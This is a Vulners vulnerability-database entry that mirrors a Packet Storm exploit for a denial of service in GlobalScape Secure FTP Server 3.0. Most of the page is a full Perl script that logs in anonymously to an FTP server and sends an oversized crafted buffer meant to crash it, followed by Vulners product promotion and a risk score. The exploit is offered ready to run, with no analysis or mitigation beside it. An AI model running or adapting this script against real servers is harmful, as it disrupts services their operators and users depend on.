Lucene search
K

GlobalScape Secure FTP Server 3.0 Denial Of Service

🗓️ 01 Feb 2024 00:00:00Reported by Fernando MengaliType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 277 Views

GlobalScape Secure FTP Server 3.0 Denial Of Service exploit using Perl scrip

Code
`#!/usr/bin/perl  
use strict;  
use IO::Socket;  
  
print "GlobalScape Secure FTP Server 3.0 - Denial of Service \n";  
  
my $payload = "\x41\x42\x0a\x00"x147;  
  
my $buffer = "\x41"x2043 . "\x41\x42\x43\x00" . "\x42"x36 . $payload;  
  
my $sock = IO::Socket::INET->new(PeerAddr => '192.168.0.10', PeerPort => 21, Proto => 'tcp');  
if ($sock) {  
print "[+] Connected to FTP server\n";  
print "[+] Sending Username\n";  
print $sock "USER anonymous\r\n";  
print "[+] Sending Password\n";  
print $sock "PASS anonymous\r\n";  
print "[+] Sending payload to exploit \nn";  
print $sock $buffer . "\r\n";  
print "[+] Exploit!\n";  
close($sock);  
} else {  
print "Can't connect to FTP\n";  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Feb 2024 00:00Current
7.4High risk
Vulners AI Score7.4
277